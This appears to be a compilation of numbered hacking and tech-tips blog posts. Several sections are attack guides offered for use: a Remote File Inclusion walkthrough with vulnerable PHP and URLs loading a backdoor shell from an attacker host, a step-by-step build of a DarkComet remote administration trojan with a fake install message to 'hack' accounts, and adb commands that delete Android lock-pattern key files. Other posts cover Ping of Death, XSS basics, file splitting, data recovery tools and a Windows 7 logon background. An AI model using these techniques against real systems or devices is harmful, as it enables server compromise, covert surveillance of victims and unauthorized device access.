41) Testing Remote File Inclusion vulnerability in web applications

Remote file inclusion(RFI) is a critical vulnerability caused by insufficient validation of user input passed to the web application.  The RFI vulnerability allows attackers to load remotely hosted malicious file such as a backdoor shell.

Vulnerable Code

Let us say a webpage called "RFI.php" that loads a code from external file using 'filename' parameter.
 

In the above screenshot, the RFI.php file loads the code from 'news.php'.

HTTP request:
http://site/RFI.php?filename=news.php

Let us check the PHP code of RFI.php :

code(RFI.php):

   <?php
        include($_GET['filename']);
   ?>

The include() function gets the all code/text from the specified file(news.php) and copies it into the current file(rfi.php).

Content of news.php file

As you can see the developer didn't validate the 'filename' and passed it directly to the 'include' function.  It results in Remote File inclusion vulnerability. 


Testing the Vulnerability:
Let us test whether the application is vulnerable to Remote File Inclusion by passing "http://www.google.com" as filename parameter to the webpage.

HTTP request:
http://site/RFI.php?filename=http://www.google.com

Hurrah, it successfully loaded the content from the Google.com :) It means the page is vulnerable to RFI :D

Exploiting the vulnerability:
A hacker with malicious intent can load a backdoor shell.  The backdoor shell allows the hacker to compromise the entire web server.

For Example:
http://site/RFI.php?filename=http://attacker/shell.txt

Using this shell, now an attacker is able to do anything in the server.  For instance, he can delete index.php file.

Example 2:

In most of the web applications, the filename is passed as parameter without the extension(.php).

For example:
http://site/RFI.php?filename=news


------------------------
Code of RFI.php:
------------------------

<?php
        include($_GET['filename'].".php");
 ?>

As you can see in the above code, the ".php" extension is appended to the filename in the PHP code.   

So, if we pass "shell.txt", then the filename will become "shell.txt.php", results in an error.

To avoid this error, you can use Null Byte.  Null byte() indicates the end of the string. The strings following the null byte will be ignored.

We can enter the null byte at the end of our filename to ignore the ".php" string.

http://site/RFI.php?filename=http://attacker/shell.txt

---------
If You would like to test how a remote file inclusion attack works, you can just download our Vulnerable app "BTS Pentesting Lab" from here:
http://code.google.com/p/bts-pentesting-lab/

In case, you would like to see the real world examples, Here is list of Vulnerability reports:
Exploit-Db

 How to Prevent Remote File Inclusion vulnerability

• Disable the 'register_globals' and 'allow_url_fopen' and 'allow_url_include' in PHP.ini file.  In latest version of PHP, they have been turned off :) so no need to worry now.
•  Validate Users' Input.

40) Transfer data over 100GB from one place to another via email Using Split Tool

Transfer data over 100GB from one place to another via email, pendrive, ­other storage device. If you want to transfer a file from
one place to another, but don’t have enough space, in your pen drive or any other external device or you want to send large data via email, it is better to split the file into pieces and transfer the small files one by one and merge them later.
HJSplit is the best freeware tool available to Windows users for this purpose. It supports file sizes of over 100 GB. In addition to that, this software doesn’t require any installation to use. Just download the zip file, extract the HJSplit.exe on your computer and doubleclick to run it. Here’s how you can split and then rejoin those pieces and
end up with a fully functional file.
Spliting a file
 

1. Double click on the HJSplit.exe file to run it. Now click on the Split
button.
 

2. click on the Input File button to choose the file you want to split.
 

3. Click on the Output button to choose the location for the output
files.
 

4. Then click on Start button to start the process.
 

NOTE:: The process of splitting the file will start. A progress bar will appear to show the status. The time
it takes will depend on the size of the file you are splitting.
Merge files
1. Run the tool again

39) Free Data Recovery Tools

1. Recuva

It is a free data recovery software from piriform, the same team that gave us ccleaner and defragler.

It is simple and easy to use.

Capable of recovering files deleted from recycle bins, memory cards and other portable device.

It also has a deep scan mode where your chances of getting the data back is even better.

Regarding compatibility, it runs good upto windows 7 32-bit. Haven’t tested it with windows 8 yet.

It is also available as a portable version i.e you can run it directly from the downloaded file which is definitely an advantage!

2. Pandora Recovery

It is also capable of recovering permanently deleted files from your hard drives.

Has a preview mode where you can view the recoverable images and texts from your harddrives.

There is an option called as surface scan where you can search for files from a corrupted or reformatted partitions.

There is also a helpful wizard which can guide you through the recovery processes.

It is compatible up to windows 7

3. Tokiwa Data Recovery

It Is the most easy to use data recovery tool currently available.

It has a simple interface with a few but powerful options.

A scan button to scan for recoverable files.

You can also search for a specific file by typing the file name in the search box.

There is also a wipe button which can permanently delete the recoverable files from any partition except the drive where your OS is installed.

4. Free UnDelete

It is just another simple tool for data recovery.

Supports various file systems such as NTFS 1.0, NTFS 2.0, FAT12, FAT16 and FAT32.

Available both in portable as well as installer versions.

5. Avira UnErase Personal

Avira UnErase personal is a bit older than the other tools listed here but still works good.

It supports file systems such as NTFS 1.0, NTFS 2.0, FAT12, FAT16 and FAT32 like others.

It also supports dynamic disks, software and hardware RAID, volume sets and stripe sets which is useful for advanced users.

The interface is less graphical and consumes less memory which is definitely good for low configuration systems.

It is also available as portable version.

38) Ping of Death

 

Ping of Death

The ping of death attack is one of the oldest network attacks. The principle of ping of death simply involves creating an IP datagram whose total size exceeds the maximum authorized size (65,536 bytes).

When such a packet is sent to a system with a vulnerable TCP/IP stack, it will cause the system to crash.
The Ping of Death attack relied on a bug in the Berkeley TCP/IP stack which also existed on most systems which copied the Berkeley network code. The ping of death was simply sending ping packets.

The maximum allowable IP packet size is 65,535 bytes, including the packet header, which is typically 20 bytes long. An ICMP echo request is an IP packet with a pseudo header, which is 8 bytes long. Therefore, the maximum allowable size of the data area of an ICMP echo request is 65,507 bytes (65,535 - 20 - 8 = 65,507).

However, many ping implementations allow the user to specify a packet size larger than 65,507 bytes. A grossly oversized ICMP packet can trigger a range of adverse system reactions such as denial of service (DoS), crashing, freezing, and rebooting.

The ping of death attack, or PoD, can cripple a network based on a flaw in the TCP/IP system. Since the maximum size for a packet is 65,535 bytes. If one were to send a packet larger than that, the receiving computer would ultimately crash from confusion.

Sending a ping of this size is against the rules of the TCP/IP protocol, but hackers can bypass this by cleverly sending the packets in fragments. When the fragments are assembled on the receiving computer, the overall packet size is too great. This will cause a buffer overflow and crash the device.

37) What is #XSS ?

we got some message about XSS -- i.e. Cross Site Scripting. so
here is some description about it. I will also write an article on our blog about it.


What is #XSS ?

So what exactly XSS is..? XSS stands for Cross Site Scripting. You can also call it is CSS but this will misinterpret a web designer as Cascading Style Sheets, so let it be XSS. In this method the attacker tries to inject a malicious (usually javascript). The attacker then can steal admin-cookies, can setup XSS worm, XSS shell's, etc. XSS are of 2 type's traditionally and other one is DOM's based.

************Non-Persistent

Non-presistent is also known as Reflected XSS. It gets reflected as the name suggest. It gets reflected on the page but does not get injected in the page. While doing such attack the should hide his script form his victim.

************Persistent

Persistent is also known as Stored XSS. In this type of XSS as the name suggest the malicious code get stored inside the page. So when ever a victim click's on the page, the script get activated and runs the malicious code.

************DOM Based

DOM stands for Document-Object Method. In this type of vulnerability occurs while content processing of the document.

If any body have any problems then comment here ... i will reply to you.

36) HACK A ACCOUNT USING REMOTE ADMINISTRATION TOOL [RAT]

A remote administration tool (or RAT) is a program that allows certain persons to connect to
and manage remote computers in the Internet or across a local network. A remote
administration tool is based on the server and client technology. The server part runs on a
controlled computer and receives commands from the client, which is installed on other remote
host. A remote administration tool works in background and hides from the user. The person
who controls it can monitor user’s activity, manage files, install additional software, control the
entire system including any present application or hardware device, modify essential system
settings, turn off or restart a computer



Go on http://www.no-ip.com/, Create your Account and click on "Download".


Now Click on "Windows"

Now Click on "Download 3.0.4"

Now you must install No-DUP 3.0, Click on "Next"


Now, choose "Install Location" and click on "Next"

Now choose "Start Menu Folder" and Click on "Install"

Setup was completed successfully, click on "Close"

Now, go on http://www.no-ip.com/ and click on "Login" then type your Email and your Password.

Now, click on "Add a Host"

Choose a "Hostname", enter your IP address and click on "Create Host".

Done, Now open No-IP DUC 3.0 and enter your email and your password and click on "OK"

Now, Select your "HOST" and click on "Save".

Done, you can close No-IP DUC 3.0

Download DarkComet v4.0 here and run DarkComet.

Click on [+], Choose your port (I advice 1604) and click on "Listen".

Now click on "Settings".

Click on "Mo-IP Updater" and type your No-IP informations.

Now you will edit your server, click on "Edit Server" and click on "Network Settings", enter your

informations and click on "Test network".

Click on "Module Startup" and choose your settings.

Click on "Install Message" and choose your fake message.

Now click on "Module Shield" and choose your settings.

Now click on "Build Module" and click on "Build Server".

See the Results

35) WORLDS TOP 10 HACKERS !!

World Top 10 Hackers

Hackers in Hollywood tend to be portrayed in extremes: They're either modern-day equivalents of James Bond or anti-social yet tech-savvy teenagers looking for ways to amuse themselves at the expense of other computer users. The truth is, hackers are an assortment of IT-knowledgeable individuals who are both responsible for billions of dollars of losses yearly and the unstoppable evolution of the worldwide web. As such, this article will tackle the good, the bad, and the geeky hackers of modern-day computing.

1. Shawn Fanning: This hacker has helped a lot in revolutionizing (that is, enacting actual, irrefutable change) the music industry, particularly in the domain of music distribution. Together with the help of Shaun Parker and Jordan Ritter, the three visionaries set out to launch Napster—a P2P application that ultimately popularized the free exchange of music files via the Internet.

2. Robert Morris: He is the inventor of first Internet-based worm ever made. His namesake exploited both fingerd and sendmail vulnerabilities in order to induce buffer overflow. After serving time for his supposed cyber crimes, he made a profitable startup that was bought by Yahoo for a considerable sum and became the co-founder of ViaWeb along with Paul Graham.

3. VallaH: This hacker was the one responsible for the first smart DOS attack, ping-of-death, and jolt.c, which enabled him to entertain script kiddies across cyberspace and bring entire multinational companies down on their knees.

4. Gordon Lyon: More renowned for the nom de net of "Fyodor", Lyon is credited as the creator of Nmap (the hacker's first-ever tool that has made a big enough impact in pop culture to be included in movies like "The Bourne Ultimatum" and "The Matrix"), the founder of insecure.org, and the pioneer of service fingerprinting.

5. Kevin Mitnick: He's arguably the most famous real-life black hat hacker because of all the media and press attention he has gotten over the last decade. For years, he had been imprisoned without charge by the government before he was sentenced to three years and ten months with consideration of the time he'd already spent in jail. He now runs his own IT security company at present.

6. The Mentor: This anonymous, cultish hacker leader was the author of the Phrack-magazine-published Hacker Manifesto. He served as an inspiration to a generation of children worldwide who wanted to become a hacker just like him.

7. Karl Koch: This German hacker from the 1980s was far more well-known for his controversial antics (i.e., his paranoia over the Illuminati, his obsession with the number 23, and his cocaine addiction) than his involvement in a computer espionage incident during the Cold War.

8. Richard Jones: A young Australian hacker (also known by the code name of Electron) who spread disorder across the Internet with nothing more than a modem and his technical know-how. After being arrested by Australian Federal Police in 1990 and serving time in jail, he eventually became a security consultant and researcher.

9. Kevin Poulsen: He's a former black hat hacker who's now the senior editor of Wired News. He once used his hacking skills to "phreak" his way into winning an LA radio contest and getting a brand new Porsche, but he was ultimately caught and arrested for his actions.

10. Adrian Lamo: This gray hat hacker demonstrated to everyone across the globe that it's possible to take down large websites by just manipulating URLs. He is now an award-winning journalist.

34) How To Change BackGround Screen Of Windows 7

Windows 7 makes it possible to change the welcome screen that appears when you start your computer without any third-party software, but this setting is well hidden. You can set any image you like as your background.

This setting is intended for original equipment manufacturers (OEMs) to customize their systems, but there’s nothing stopping you from using it yourself. All you have to do is change a single registry value and put an image file in the correct location.

Enabling Custom Backgrounds

This feature is disabled by default, so you’ll have to enable it from the Registry Editor. You can also use the Group Policy Editor if you have a Professional version of Windows – scroll down a bit for the Group Policy Editor method.

Launch the Registry Editor by typing regedit into the search box in the Start menu and pressing Enter.

In the Registry Editor, navigate to the following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background

You’ll see an DWORD value named OEMBackground. If you don’t see it, right-click in the right pane, point to the New submenu and create a new DWORD value with this name.

Double-click the OEMBackground value and set its value to 1.

Note that selecting a new theme in the Appearance and Personalization window will “unset” this registry value. Selecting a theme will change the value of the key to the value stored in the theme’s .ini file, which is probably 0 – if you change your theme, you’ll have to perform this registry tweak again.

Changing the setting in group policy will allow it to persist even when you change your theme, but the Group Policy Editor is only available in Professional editions of Windows.

If you have access to the Group Policy Editor, launch gpedit.msc from the Start menu.

Navigate to the following section in the Group Policy Editor window:

Computer Configuration\Administrative Templates\System\Logon

You’ll find a setting named “Always use custom login background.” Double-click it and set it to Enabled.

Setting An Image

Your image file must be less than 256 KB in size. It’s also a good idea to use an image file that matches the resolution of your monitor, so it won’t look stretched.

Windows looks for the custom logon screen background image in the following directory:

C:\Windows\System32\oobe\info\backgrounds

By default, the info and backgrounds folders don’t exist. Navigate to the C:\Windows\System32\oobe folder and create them yourself by right-clicking inside the folder, pointing to New, and selecting New Folder.

Copy your desired background image to the backgrounds folder and name it backgroundDefault.jpg.

(I can see the inevitable question coming in the comments, so if you like this wallpaper image, you can get it here.)

The change will take effect immediately – no system reboot required. The first time you log out or lock your screen (try the WinKey-L keyboard shortcut), you’ll see your new background.

Third-Party Tools

You don’t have to do this by hand. There are a variety of third-party tools that automate this process for you, like Windows Logon Background Changer, which we’ve covered in the past. Windows Logon Background Changer and other utilities just change this registry value and put the image file in the correct location for you.

---

To get the default logon screen back, just delete the backgroundDefault.jpg file. Windows will use the default background if no custom background image is available

33) Crack Or Unlock Android Pattern From Android Device

List Of Requirements Things:-

1.     Linux distro

2.     Android phone

3.     USB cable

4.     ADB

Step-1

1.Connect Your Android Device With your PC using USB cable.

Step-2:- Installing ADB over terminal

1.Boot into any Linux distro you have.
2.Open up terminal and type :

Quote:sudo apt-get install android-tools-adb

 Above Command will install ADB.

Step-3:- Disabling pattern unlock over terminal

1.Open up terminal again and type :

Quote:adb devices
adb shell
cd data/system
su
rm *.key

After that Disconnect your Android Device and REBOOT Your Android Device.